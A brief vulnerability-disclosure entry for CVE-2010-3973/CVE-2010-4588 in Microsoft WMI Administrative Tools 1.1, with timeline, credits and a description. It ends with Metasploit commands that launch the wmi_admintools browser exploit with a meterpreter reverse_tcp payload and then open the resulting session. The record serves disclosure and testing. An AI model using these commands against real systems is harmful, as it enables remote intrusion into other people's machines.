Timeline :
Vulnerability & PoC disclosed by WooYun the 2010-12-22
Metasploit PoC provided the 2010-12-22
PoC provided by :
WooYun
MC
jduck
Reference(s) :
Affected version(s) :
Microsoft WMI Administrative Tools 1.1
Tested on Windows XP SP3
Description :
The 22 December WooYun, a security researcher, has disclose a vulnerability, accompanied by a PoC, for WMI Administrative Tools 1.1. These tools are not included by default in Microsoft Windows, and need to be additionally installed on Windows XP. The same day, Metasploit team has release a module to industrialize the exploitation of this vulnerability. This vulnerability is identified by CVE-2010-3973 and CVE-2010-4588. Actually they are no Microsoft planned patch.
Commands :
use exploit/windows/browser/wmi_admintools
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit
sessions -i 1sysinfo
ipconfig